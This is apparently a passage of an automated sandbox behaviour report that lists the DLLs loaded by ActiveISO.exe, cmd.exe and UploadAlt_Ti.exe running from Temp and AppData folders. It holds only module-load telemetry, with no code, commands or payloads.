Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: qt5widgets.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: starburn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5printsupport.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5widgets.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5network.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5widgets.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: starburn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5printsupport.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5widgets.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5network.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5widgets.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: comsvcs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmlua.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: starburn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5printsupport.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5widgets.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5network.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5widgets.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: pdh.dll	Jump to behavior
